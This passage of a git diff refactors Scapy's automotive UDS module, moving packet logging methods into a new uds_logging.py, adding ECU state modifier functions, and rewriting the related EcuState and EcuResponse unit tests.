pkt.reportType in [0x6, 0x10]) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), repr(pkt) - bind_layers(UDS, UDS_RDTCI, service=0x19) @@ -989,10 +831,6 @@ def answers(self, other): return other.__class__ == UDS_RDTCI \ and other.reportType == self.reportType - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), repr(pkt) - bind_layers(UDS, UDS_RDTCIPR, service=0x59) @@ -1009,17 +847,9 @@ class UDS_RC(Packet): name = 'RoutineControl' fields_desc = [ ByteEnumField('routineControlType', 0, routineControlTypes), - XShortEnumField('routineIdentifier', 0, routineControlIdentifiers), - StrField('routineControlOptionRecord', b"", fmt="B"), + XShortEnumField('routineIdentifier', 0, routineControlIdentifiers) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"),\ - (pkt.routineControlType, - pkt.routineIdentifier, - pkt.routineControlOptionRecord) - bind_layers(UDS, UDS_RC, service=0x31) @@ -1027,23 +857,15 @@ def get_log(pkt): class UDS_RCPR(Packet): name = 'RoutineControlPositiveResponse' fields_desc = [ - ByteEnumField('routineControlType', 0, - UDS_RC.routineControlTypes), + ByteEnumField('routineControlType', 0, UDS_RC.routineControlTypes), XShortEnumField('routineIdentifier', 0, UDS_RC.routineControlIdentifiers), - StrField('routineStatusRecord', b"", fmt="B"), ] def answers(self, other): return other.__class__ == UDS_RC \ - and other.routineControlType == self.routineControlType - - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"),\ - (pkt.routineControlType, - pkt.routineIdentifier, - pkt.routineStatusRecord) + and other.routineControlType == self.routineControlType \ + and other.routineIdentifier == self.routineIdentifier bind_layers(UDS, UDS_RCPR, service=0x71) @@ -1077,12 +899,6 @@ class UDS_RD(Packet): lambda pkt: pkt.memorySizeLen == 4) ] - @staticmethod - def get_log(pkt): - addr = getattr(pkt, "memoryAddress%d" % pkt.memoryAddressLen) - size = getattr(pkt, "memorySize%d" % pkt.memorySizeLen) - return pkt.sprintf("%UDS.service%"), (addr, size) - bind_layers(UDS, UDS_RD, service=0x34) @@ -1098,10 +914,6 @@ class UDS_RDPR(Packet): def answers(self, other): return other.__class__ == UDS_RD - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), pkt.memorySizeLen - bind_layers(UDS, UDS_RDPR, service=0x74) @@ -1132,12 +944,6 @@ class UDS_RU(Packet): lambda pkt: pkt.memorySizeLen == 4) ] - @staticmethod - def get_log(pkt): - addr = getattr(pkt, "memoryAddress%d" % pkt.memoryAddressLen) - size = getattr(pkt, "memorySize%d" % pkt.memorySizeLen) - return pkt.sprintf("%UDS.service%"), (addr, size) - bind_layers(UDS, UDS_RU, service=0x35) @@ -1153,10 +959,6 @@ class UDS_RUPR(Packet): def answers(self, other): return other.__class__ == UDS_RU - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), pkt.memorySizeLen - bind_layers(UDS, UDS_RUPR, service=0x75) @@ -1169,11 +971,6 @@ class UDS_TD(Packet): StrField('transferRequestParameterRecord', b"", fmt="B") ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"),\ - (pkt.blockSequenceCounter, pkt.transferRequestParameterRecord) - bind_layers(UDS, UDS_TD, service=0x36) @@ -1189,10 +986,6 @@ def answers(self, other): return other.__class__ == UDS_TD \ and other.blockSequenceCounter == self.blockSequenceCounter - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), pkt.blockSequenceCounter - bind_layers(UDS, UDS_TDPR, service=0x76) @@ -1204,11 +997,6 @@ class UDS_RTE(Packet): StrField('transferRequestParameterRecord', b"", fmt="B") ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"),\ - pkt.transferRequestParameterRecord - bind_layers(UDS, UDS_RTE, service=0x37) @@ -1222,11 +1010,6 @@ class UDS_RTEPR(Packet): def answers(self, other): return other.__class__ == UDS_RTE - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"),\ - pkt.transferResponseParameterRecord - bind_layers(UDS, UDS_RTEPR, service=0x77) @@ -1271,11 +1054,6 @@ def _contains_file_size(packet): lambda p: UDS_RFT._contains_file_size(p)) ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"),\ - pkt.modeOfOperation - bind_layers(UDS, UDS_RFT, service=0x38) @@ -1317,11 +1095,6 @@ def _contains_data_format_identifier(packet): def answers(self, other): return other.__class__ == UDS_RFT - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"),\ - pkt.modeOfOperation - bind_layers(UDS, UDS_RFTPR, service=0x78) @@ -1336,10 +1109,6 @@ class UDS_IOCBI(Packet): StrField('controlEnableMaskRecord', b"", fmt="B") ] - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), pkt.dataIdentifier - bind_layers(UDS, UDS_IOCBI, service=0x2F) @@ -1355,10 +1124,6 @@ def answers(self, other): return other.__class__ == UDS_IOCBI \ and other.dataIdentifier == self.dataIdentifier - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), pkt.dataIdentifier - bind_layers(UDS, UDS_IOCBIPR, service=0x6F) @@ -1423,12 +1188,6 @@ def answers(self, other): (self.negativeResponseCode != 0x78 or conf.contribs['UDS']['treat-response-pending-as-answer']) - @staticmethod - def get_log(pkt): - return pkt.sprintf("%UDS.service%"), \ - (pkt.sprintf("%UDS_NR.requestServiceId%"), - pkt.sprintf("%UDS_NR.negativeResponseCode%")) - bind_layers(UDS, UDS_NR, service=0x7f) diff --git a/scapy/contrib/automotive/uds_ecu_states.py b/scapy/contrib/automotive/uds_ecu_states.py new file mode 100644 index 00000000000..90800f443d6 --- /dev/null +++ b/scapy/contrib/automotive/uds_ecu_states.py @@ -0,0 +1,50 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = UDS EcuState modifications +# scapy.contrib.status = library + +from scapy.contrib.automotive.uds import UDS_DSCPR, UDS_ERPR, UDS_SAPR, \ + UDS_RDBPIPR, UDS_CCPR, UDS_TPPR +from scapy.packet import Packet +from scapy.contrib.automotive.ecu import EcuState + + +@EcuState.extend_pkt_with_modifier(UDS_DSCPR) +def UDS_DSCPR_modify_ecu_state(self, req, state): + # type: (Packet, Packet, EcuState) -> None + state.session = self.diagnosticSessionType # type: ignore + + +@EcuState.extend_pkt_with_modifier(UDS_ERPR) +def UDS_ERPR_modify_ecu_state(self, req, state): + # type: (Packet, Packet, EcuState) -> None + state.reset() + state.session = 1 # type: ignore + + +@EcuState.extend_pkt_with_modifier(UDS_SAPR) +def UDS_SAPR_modify_ecu_state(self, req, state): + # type: (Packet, Packet, EcuState) -> None + if self.securityAccessType % 2 == 0: + state.security_level = self.securityAccessType # type: ignore + + +@EcuState.extend_pkt_with_modifier(UDS_CCPR) +def UDS_CCPR_modify_ecu_state(self, req, state): + # type: (Packet, Packet, EcuState) -> None + state.communication_control = self.controlType # type: ignore + + +@EcuState.extend_pkt_with_modifier(UDS_TPPR) +def UDS_TPPR_modify_ecu_state(self, req, state): + # type: (Packet, Packet, EcuState) -> None + state.tp = 1 # type: ignore + + +@EcuState.extend_pkt_with_modifier(UDS_RDBPIPR) +def UDS_RDBPIPR_modify_ecu_state(self, req, state): + # type: (Packet, Packet, EcuState) -> None + state.pdid = self.periodicDataIdentifier # type: ignore diff --git a/scapy/contrib/automotive/uds_logging.py b/scapy/contrib/automotive/uds_logging.py new file mode 100644 index 00000000000..062ebc9d24c --- /dev/null +++ b/scapy/contrib/automotive/uds_logging.py @@ -0,0 +1,323 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = UDS Ecu logging additions +# scapy.contrib.status = library + +from scapy.contrib.automotive.uds import UDS_DSCPR, UDS_ERPR, UDS_SAPR, \ + UDS_CCPR, UDS_TPPR, UDS_DSC, UDS_ER, UDS_RDPR, UDS_TDPR, UDS_RD, UDS_TD, \ + UDS_CC, UDS_NR, UDS_SA, UDS_RDBIPR, UDS_LC, UDS_RC, UDS_TP, UDS_RU, \ + UDS_IOCBIPR, UDS_WDBIPR, UDS_CDTCIPR, UDS_CDTCI, UDS_RDTCIPR, \ + UDS_RDTCI, UDS_RMBAPR, UDS_WMBAPR, UDS_WMBA, UDS_LCPR, UDS_RCPR, UDS_RFT, \ + UDS_RTE, UDS_RTEPR, UDS_RFTPR, UDS_IOCBI, UDS_RDBI, UDS_RMBA, UDS_WDBI, \ + UDS_CDTCS, UDS_CDTCSPR, UDS_SDT, UDS_SDTPR, UDS_RUPR +from scapy.packet import Packet +from scapy.compat import Tuple, Any +from scapy.contrib.automotive.ecu import Ecu + + +@Ecu.extend_pkt_with_logging(UDS_DSC) +def UDS_DSC_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_DSC.diagnosticSessionType%") + + +@Ecu.extend_pkt_with_logging(UDS_DSCPR) +def UDS_DSCPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_DSCPR.diagnosticSessionType%") + + +@Ecu.extend_pkt_with_logging(UDS_ER) +def UDS_ER_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_ER.resetType%") + + +@Ecu.extend_pkt_with_logging(UDS_ERPR) +def UDS_ERPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_ER.resetType%") + + +@Ecu.extend_pkt_with_logging(UDS_SA) +def UDS_SA_get_log(self): + # type: (Packet) -> Tuple[str, Any] + if self.securityAccessType % 2 == 1: + return self.sprintf("%UDS.service%"),\ + (self.securityAccessType, None) + else: + return self.sprintf("%UDS.service%"),\ + (self.securityAccessType, self.securityKey) + + +@Ecu.extend_pkt_with_logging(UDS_SAPR) +def UDS_SAPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + if self.securityAccessType % 2 == 0: + return self.sprintf("%UDS.service%"),\ + (self.securityAccessType, None) + else: + return self.sprintf("%UDS.service%"),\ + (self.securityAccessType, self.securitySeed) + + +@Ecu.extend_pkt_with_logging(UDS_CC) +def UDS_CC_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_CC.controlType%") + + +@Ecu.extend_pkt_with_logging(UDS_CCPR) +def UDS_CCPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_CCPR.controlType%") + + +@Ecu.extend_pkt_with_logging(UDS_TP) +def UDS_TP_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), self.subFunction + + +@Ecu.extend_pkt_with_logging(UDS_TPPR) +def UDS_TPPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), self.zeroSubFunction + + +@Ecu.extend_pkt_with_logging(UDS_SDT) +def UDS_SDT_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), self.securityDataRequestRecord + + +@Ecu.extend_pkt_with_logging(UDS_SDTPR) +def UDS_SDTPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), self.securityDataResponseRecord + + +@Ecu.extend_pkt_with_logging(UDS_CDTCS) +def UDS_CDTCS_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_CDTCS.DTCSettingType%") + + +@Ecu.extend_pkt_with_logging(UDS_CDTCSPR) +def UDS_CDTCSPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_CDTCSPR.DTCSettingType%") + + +@Ecu.extend_pkt_with_logging(UDS_LC) +def UDS_LC_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS.linkControlType%") + + +@Ecu.extend_pkt_with_logging(UDS_LCPR) +def UDS_LCPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS.linkControlType%") + + +@Ecu.extend_pkt_with_logging(UDS_RDBI) +def UDS_RDBI_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_RDBI.identifiers%") + + +@Ecu.extend_pkt_with_logging(UDS_RDBIPR) +def UDS_RDBIPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_RDBIPR.dataIdentifier%") + + +@Ecu.extend_pkt_with_logging(UDS_RMBA) +def UDS_RMBA_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + (getattr(self, "memoryAddress%d" % self.memoryAddressLen), + getattr(self, "memorySize%d" % self.memorySizeLen)) + + +@Ecu.extend_pkt_with_logging(UDS_RMBAPR) +def UDS_RMBAPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), self.dataRecord + + +@Ecu.extend_pkt_with_logging(UDS_WDBI) +def UDS_WDBI_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_WDBI.dataIdentifier%") + + +@Ecu.extend_pkt_with_logging(UDS_WDBIPR) +def UDS_WDBIPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + self.sprintf("%UDS_WDBIPR.dataIdentifier%") + + +@Ecu.extend_pkt_with_logging(UDS_WMBA) +def UDS_WMBA_get_log(self): + # type: (Packet) -> Tuple[str, Any] + addr = getattr(self, "memoryAddress%d" % self.memoryAddressLen) + size = getattr(self, "memorySize%d" % self.memorySizeLen) + return self.sprintf("%UDS.service%"), (addr, size, self.dataRecord) + + +@Ecu.extend_pkt_with_logging(UDS_WMBAPR) +def UDS_WMBAPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + addr = getattr(self, "memoryAddress%d" % self.memoryAddressLen) + size = getattr(self, "memorySize%d" % self.memorySizeLen) + return self.sprintf("%UDS.service%"), (addr, size) + + +@Ecu.extend_pkt_with_logging(UDS_CDTCI) +def UDS_CDTCI_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + (self.groupOfDTCHighByte, self.groupOfDTCMiddleByte, + self.groupOfDTCLowByte) + + +@Ecu.extend_pkt_with_logging(UDS_CDTCIPR) +def UDS_CDTCIPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), None + + +@Ecu.extend_pkt_with_logging(UDS_RDTCI) +def UDS_RDTCI_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), repr(self) + + +@Ecu.extend_pkt_with_logging(UDS_RDTCIPR) +def UDS_RDTCIPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), repr(self) + + +@Ecu.extend_pkt_with_logging(UDS_RC) +def UDS_RC_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"),\ + (self.routineControlType, + self.routineIdentifier) + + +@Ecu.extend_pkt_with_logging(UDS_RCPR) +def UDS_RCPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"),\ + (self.routineControlType, + self.routineIdentifier) + + +@Ecu.extend_pkt_with_logging(UDS_RD) +def UDS_RD_get_log(self): + # type: (Packet) -> Tuple[str, Any] + addr = getattr(self, "memoryAddress%d" % self.memoryAddressLen) + size = getattr(self, "memorySize%d" % self.memorySizeLen) + return self.sprintf("%UDS.service%"), (addr, size) + + +@Ecu.extend_pkt_with_logging(UDS_RDPR) +def UDS_RDPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), self.memorySizeLen + + +@Ecu.extend_pkt_with_logging(UDS_RU) +def UDS_RU_get_log(self): + # type: (Packet) -> Tuple[str, Any] + addr = getattr(self, "memoryAddress%d" % self.memoryAddressLen) + size = getattr(self, "memorySize%d" % self.memorySizeLen) + return self.sprintf("%UDS.service%"), (addr, size) + + +@Ecu.extend_pkt_with_logging(UDS_RUPR) +def UDS_RUPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), self.memorySizeLen + + +@Ecu.extend_pkt_with_logging(UDS_TD) +def UDS_TD_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"),\ + (self.blockSequenceCounter, self.transferRequestParameterRecord) + + +@Ecu.extend_pkt_with_logging(UDS_TDPR) +def UDS_TDPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), self.blockSequenceCounter + + +@Ecu.extend_pkt_with_logging(UDS_RTE) +def UDS_RTE_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"),\ + self.transferRequestParameterRecord + + +@Ecu.extend_pkt_with_logging(UDS_RTEPR) +def UDS_RTEPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"),\ + self.transferResponseParameterRecord + + +@Ecu.extend_pkt_with_logging(UDS_RFT) +def UDS_RFT_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"),\ + self.modeOfOperation + + +@Ecu.extend_pkt_with_logging(UDS_RFTPR) +def UDS_RFTPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"),\ + self.modeOfOperation + + +@Ecu.extend_pkt_with_logging(UDS_IOCBI) +def UDS_IOCBI_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), self.dataIdentifier + + +@Ecu.extend_pkt_with_logging(UDS_IOCBIPR) +def UDS_IOCBIPR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), self.dataIdentifier + + +@Ecu.extend_pkt_with_logging(UDS_NR) +def UDS_NR_get_log(self): + # type: (Packet) -> Tuple[str, Any] + return self.sprintf("%UDS.service%"), \ + (self.sprintf("%UDS_NR.requestServiceId%"), + self.sprintf("%UDS_NR.negativeResponseCode%")) diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 62271a63e7f..a90f0e763d7 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -1845,6 +1845,7 @@ def recv_raw(self, x=0xffff): except OSError: # something bad happened (e.g. the interface went down) warning("Captured no data.") + self.close() return None if ts is None: diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index 9c2f5dafb33..3e47f2b15b3 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -22,6 +22,10 @@ conf.contribs["CAN"]["swap-bytes"] = True = Load Ecu module load_contrib("automotive.ecu", globals_dict=globals()) +from scapy.contrib.automotive.uds_ecu_states import * +from scapy.contrib.automotive.uds_logging import * +from scapy.contrib.automotive.gm.gmlan_ecu_states import * +from scapy.contrib.automotive.gm.gmlan_logging import * + EcuState Basic checks @@ -310,159 +314,227 @@ s2 = EcuState(ses=3) assert s2 in s1 assert s1 not in s2 -+ Basic checks -= Check default init parameters ++ EcuState modification tests -ecu = Ecu() -assert ecu.current_session == 1 -assert ecu.current_security_level == 0 -assert ecu.communication_control == 0 += Basic definitions for tests + +class myPack1(Packet): + fields_desc = [ + IntField("fakefield", 1) + ] + +class myPack2(Packet): + fields_desc = [ + IntField("statefield", 1) + ] + +@EcuState.extend_pkt_with_modifier(myPack2) +def modify_ecu_state(self, req, ecustate): + # type: (Packet, Packet, EcuState) -> None + ecustate.state = self.statefield + +pkt = myPack1()/myPack2() +st = EcuState() +exception = False + +try: + assert st.state == 1 +except AttributeError: + exception = True + +assert exception == True +assert EcuState.is_modifier_pkt(pkt) +assert not EcuState.is_modifier_pkt(myPack1()) + +mod = EcuState.get_modified_ecu_state(pkt, Raw(), st) +assert mod != st +assert mod.state ==1 + +pkt2 = myPack1()/myPack1()/myPack1()/myPack2(statefield=5) +mod2 = EcuState.get_modified_ecu_state(pkt2, Raw(), mod) + +assert mod != mod2 +assert mod < mod2 + +pkt2 = myPack1()/myPack1()/myPack1()/myPack2(statefield=4)/myPack2(statefield=5) +mod2 = EcuState.get_modified_ecu_state(pkt2, Raw(), mod) +mod.state = 5 +assert mod != mod2 +assert mod > mod2 + ++ EcuResponse tests + += Basic checks + +resp = EcuResponse(EcuState(session=1), UDS()/UDS_DSCPR(b"\x03")) + +assert not resp.supports_state(EcuState()) +assert not resp.supports_state(EcuState(session=2)) +assert resp.supports_state(EcuState(session=1)) +assert resp.answers(UDS()/UDS_DSC(b"\x03")) + += Command checks + +resp = EcuResponse(EcuState(session=1), UDS()/UDS_DSCPR(b"\x03")) +cmd = resp.command() -= Check init parameters +print(cmd) +resp1 = eval(cmd) +assert resp1 == resp -ecu = Ecu(init_session=5, init_security_level=4, init_communication_control=2) -assert ecu.current_session == 5 -assert ecu.current_security_level == 4 -assert ecu.communication_control == 2 += Command checks 2 -= Check reset +p1 = UDS(bytes(UDS()/UDS_NR(b"\x10\x00"))) +p2 = UDS(bytes(UDS()/UDS_DSCPR(b"\x03"))) -ecu = Ecu(init_session=5, init_security_level=4, init_communication_control=2) -ecu.reset() -assert ecu.current_session == 1 -assert ecu.current_security_level == 0 -assert ecu.communication_control == 0 +resp = EcuResponse([EcuState(session=1), EcuState(session=3)], [p1, p2]) +cmd = resp.command() -+ Simple operations +print(cmd) +resp1 = eval(cmd) +assert any(resp1.supports_state(s) for s in resp.states) +assert any(resp.supports_state(s) for s in resp1.states) +assert len(resp.responses) == len(resp1.responses) +assert all(bytes(x) == bytes(y) for x, y in zip(resp.responses, resp1.responses)) +assert resp1 == resp + += Compare check + +p1 = UDS(bytes(UDS()/UDS_NR(b"\x10\x00"))) +p2 = UDS(bytes(UDS()/UDS_DSCPR(b"\x03"))) + +resp = EcuResponse([EcuState(session=1), EcuState(session=3)], [p1, p2]) + +resp1 = EcuResponse([EcuState(session=1)], [p1, p2]) + +resp2 = EcuResponse([EcuState(session=2)], [p1, p2]) +resp3 = EcuResponse([EcuState(session=1)], [p2]) + + +assert resp == resp1 +assert resp != resp2 +assert resp != resp3 + += Key response check + +req = UDS()/UDS_DSC(b"\x03") +p1 = UDS(bytes(UDS()/UDS_NR(b"\x10\x00"))) +p2 = UDS(bytes(UDS()/UDS_DSCPR(b"\x03"))) + +resp = EcuResponse([EcuState(session=1), EcuState(session=3)], [p1, p2]) + +assert resp.answers(req) +assert resp.key_response.answers(req) + + + ++ Ecu Simple operations = Log all commands applied to an Ecu -~ docs -* This example shows the logging mechanism of an Ecu object. -* The log of an Ecu is a dictionary of applied UDS commands. -* The key for this dictionary the UDS service name. The value consists of a list -* of tuples, containing a timestamp and a log value - -msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), # no_docs - UDS(service=16) / UDS_DSC(diagnosticSessionType=4), # no_docs - UDS(service=16) / UDS_DSC(diagnosticSessionType=5), # no_docs - UDS(service=16) / UDS_DSC(diagnosticSessionType=6), # no_docs - UDS(service=16) / UDS_DSC(diagnosticSessionType=2)] # no_docs + +msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), + UDS(service=16) / UDS_DSC(diagnosticSessionType=4), + UDS(service=16) / UDS_DSC(diagnosticSessionType=5), + UDS(service=16) / UDS_DSC(diagnosticSessionType=6), + UDS(service=16) / UDS_DSC(diagnosticSessionType=2)] ecu = Ecu(verbose=False, store_supported_responses=False) ecu.update(PacketList(msgs)) -assert len(ecu.log["DiagnosticSessionControl"]) == 5 # no_docs +assert len(ecu.log["DiagnosticSessionControl"]) == 5 timestamp, value = ecu.log["DiagnosticSessionControl"][0] -assert timestamp > 0 # no_docs -assert value == "extendedDiagnosticSession" # no_docs -assert ecu.log["DiagnosticSessionControl"][-1][1] == "programmingSession" # no_docs +assert timestamp > 0 +assert value == "extendedDiagnosticSession" +assert ecu.log["DiagnosticSessionControl"][-1][1] == "programmingSession" = Trace all commands applied to an Ecu -~ docs -* This example shows the trace mechanism of an Ecu object. -* Traces of the current state of the Ecu object and the received message are -* print on stdout. Some messages, depending on the protocol, will change the -* internal state of the Ecu. -msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), # no_docs - UDS(service=80) / UDS_DSCPR(diagnosticSessionType=3, sessionParameterRecord=b'\\x002\\x01\\xf4')] # no_docs +msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), + UDS(service=80) / UDS_DSCPR(diagnosticSessionType=3, sessionParameterRecord=b'\\x002\\x01\\xf4')] ecu = Ecu(verbose=True, logging=False, store_supported_responses=False) ecu.update(PacketList(msgs)) -assert ecu.current_session == 3 # no_docs -assert ecu.current_security_level == 0 # no_docs -assert ecu.communication_control == 0 # no_docs +assert ecu.state.session == 3 = Generate supported responses of an Ecu -~ docs -* This example shows a mechanism to clone a real world Ecu by analyzing a list of Packets. -msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), # no_docs - UDS(service=80) / UDS_DSCPR(diagnosticSessionType=3, sessionParameterRecord=b'\\x002\\x01\\xf4'), # no_docs - UDS(service=16) / UDS_DSC(diagnosticSessionType=4)] # no_docs +msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), + UDS(service=80) / UDS_DSCPR(diagnosticSessionType=3, sessionParameterRecord=b'\\x002\\x01\\xf4'), + UDS(service=16) / UDS_DSC(diagnosticSessionType=4)] ecu = Ecu(verbose=False, logging=False, store_supported_responses=True) ecu.update(PacketList(msgs)) supported_responses = ecu.supported_responses unanswered_packets = ecu.unanswered_packets -assert ecu.current_session == 3 # no_docs -assert ecu.current_security_level == 0 # no_docs -assert ecu.communication_control == 0 # no_docs -assert len(supported_responses) == 1 # no_docs -assert len(unanswered_packets) == 1 # no_docs -response = supported_responses[0] # no_docs -assert response.in_correct_session(1) # no_docs -assert response.has_security_access(0) # no_docs -assert response.responses[-1].service == 80 # no_docs -assert unanswered_packets[0].diagnosticSessionType == 4 # no_docs +assert ecu.state.session == 3 +assert len(supported_responses) == 1 +assert len(unanswered_packets) == 1 +response = supported_responses[0] +print(response.command()) +assert response.supports_state(EcuState()) +assert response.key_response.service == 80 +assert unanswered_packets[0].diagnosticSessionType == 4 -+ Advanced checks + ++ Ecu Advanced checks = Analyze multiple UDS messages -~ docs -* This example shows how to load ``UDS`` messages from a ``.pcap`` file containing ``CAN`` messages -* A ``PcapReader`` object is used as socket and an ``ISOTPSession`` parses ``CAN`` frames to ``ISOTP`` frames -* which are then casted to ``UDS`` objects through the ``basecls`` parameter with PcapReader("test/contrib/automotive/ecu_trace.pcap.gz") as sock: udsmsgs = sniff(session=ISOTPSession, session_kwargs={"use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) -assert len(udsmsgs) == 50 # no_docs +assert len(udsmsgs) == 50 ecu = Ecu() ecu.update(udsmsgs) -response = ecu.supported_responses[0] # no_docs -assert response.in_correct_session(1) # no_docs -assert response.has_security_access(0) # no_docs -assert response.responses[0].service == 80 # no_docs -assert response.responses[0].diagnosticSessionType == 3 # no_docs -response = ecu.supported_responses[1] # no_docs -assert response.in_correct_session(3) # no_docs -assert response.has_security_access(0) # no_docs -assert response.responses[0].service == 80 # no_docs -assert response.responses[0].diagnosticSessionType == 2 # no_docs -response = ecu.supported_responses[4] # no_docs -assert response.in_correct_session(2) # no_docs -assert response.has_security_access(18) # no_docs -assert response.responses[0].service == 110 # no_docs -assert response.responses[0].dataIdentifier == 61786 # no_docs +response = ecu.supported_responses[0] +assert response.supports_state(EcuState()) +assert response.key_response.service == 80 +assert response.key_response.diagnosticSessionType == 3 +response = ecu.supported_responses[1] +assert response.supports_state(EcuState(session=3)) +assert response.key_response.service == 80 +assert response.key_response.diagnosticSessionType == 2 +response = ecu.supported_responses[4] +print(response) +state = EcuState(session=2, security_level=18) +print(state) +assert response.supports_state(state) +assert response.key_response.service == 110 +assert response.key_response.dataIdentifier == 61786 assert len(ecu.log["TransferData"]) == 2 ++ EcuSession tests = Analyze on the fly with EcuSession -~ docs -* This example shows the usage of a EcuSession in sniff. An ISOTPSocket or any -* socket like object which returns entire messages of the right protocol can be used. -* A ``EcuSession`` is used as supersession in an ``ISOTPSession``. To obtain the ``Ecu`` object from a ``EcuSession``, -* the ``EcuSession`` has to be created outside of sniff. session = EcuSession() with PcapReader("test/contrib/automotive/ecu_trace.pcap.gz") as sock: udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) -assert len(udsmsgs) == 50 # no_docs +assert len(udsmsgs) == 50 ecu = session.ecu -response = ecu.supported_responses[0] # no_docs -assert response.in_correct_session(1) # no_docs -assert response.has_security_access(0) # no_docs -assert response.responses[0].service == 80 # no_docs -assert response.responses[0].diagnosticSessionType == 3 # no_docs -response = ecu.supported_responses[1] # no_docs -assert response.in_correct_session(3) # no_docs -assert response.has_security_access(0) # no_docs -assert response.responses[0].service == 80 # no_docs -assert response.responses[0].diagnosticSessionType == 2 # no_docs -response = ecu.supported_responses[4] # no_docs -assert response.in_correct_session(2) # no_docs -assert response.has_security_access(18) # no_docs -assert response.responses[0].service == 110 # no_docs -assert response.responses[0].dataIdentifier == 61786 # no_docs -assert 